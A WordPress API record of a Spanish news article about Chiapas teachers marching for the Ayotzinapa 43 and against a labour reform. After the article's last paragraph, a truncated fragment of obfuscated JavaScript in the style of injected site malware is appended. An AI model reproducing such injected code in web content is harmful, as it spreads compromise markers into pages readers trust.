{"id":20619,"date":"2025-02-27T04:04:43","date_gmt":"2025-02-27T04:04:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20619"},"modified":"2025-02-27T04:04:44","modified_gmt":"2025-02-27T04:04:44","slug":"maestros-vuelven-a-salir-a-las-calles-exigen-diferentes-demandas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20619","title":{"rendered":"Maestros vuelven a salir a las calles, exigen diferentes demandas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250226-WA0025-1024x768.jpg\" alt=\"\" class=\"wp-image-20620\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250226-WA0025-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250226-WA0025-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250226-WA0025-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250226-WA0025.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>26 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Maestros de la Secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n (SNTE) marcharon este martes por la avenida principal de la capital chiapaneca para exigir justicia por los 43 estudiantes de Ayotzinapa desaparecidos en 2014.<\/p>\n\n\n\n<p>En esta marcha rechazaron tambi\u00e9n la reforma laboral que, aseguran, vulnera sus derechos.<\/p>\n\n\n\n<p>Isael Gonz\u00e1lez V\u00e1zquez, secretario general del sindicato en Chiapas, calific\u00f3 la movilizaci\u00f3n como un acto contra &#8220;una d\u00e9cada de impunidad&#8221; y las pol\u00edticas que &#8220;profundizan la precarizaci\u00f3n&#8221;.<\/p>\n\n\n\n<p>En un discurso Gonz\u00e1lez V\u00e1zquez critic\u00f3 la falta de avances en el caso Ayotzinapa: &#8220;Hoy nos manifestamos en el marco de un a\u00f1o m\u00e1s de injusticia. Inicia otro sexenio y los 43 siguen sin aparecer&#8221;. Record\u00f3 que las movilizaciones se suspendieron durante la pandemia, pero subray\u00f3: &#8220;Nunca cesamos en la lucha. Por cada 26 del mes, alzamos la voz&#8221;.<br>El l\u00edder sindical centr\u00f3 su cr\u00edtica en una iniciativa enviada por el Ejecutivo federal al Congreso, que \u2014seg\u00fan denunci\u00f3\u2014 incumple promesas del presidente L\u00f3pez Obrador.<br>Argument\u00f3 que \u00f1a propuesta no restablece el derecho a retiro a los 28 a\u00f1os de servicio para mujeres y 30 para hombres, prometido en 2018.<br>&#8220;Si son del mismo movimiento, \u00bfpor qu\u00e9 no honran los compromisos del presidente?&#8221;, cuestion\u00f3, en referencia al video donde L\u00f3pez Obrador prometi\u00f3 revertir la reforma de 2007.<br>Gonz\u00e1lez V\u00e1zquez anunci\u00f3 que este viernes la Secci\u00f3n 7 realizar\u00e1 una asamblea estatal para definir un plan de acci\u00f3n y urgi\u00f3 al SNTE a convocar una asamblea nacional.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 26 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Maestros de la Secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n (SNTE) marcharon este martes por la avenida principal de la capital chiapaneca para exigir justicia por los 43 estudiantes de Ayotzinapa desaparecidos en 2014. En esta marcha rechazaron tambi\u00e9n la reforma laboral que, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20620,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20619","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20619","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20619"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20619\/revisions"}],"predecessor-version":[{"id":20621,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20619\/revisions\/20621"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20620"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20619"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20619"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20619"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}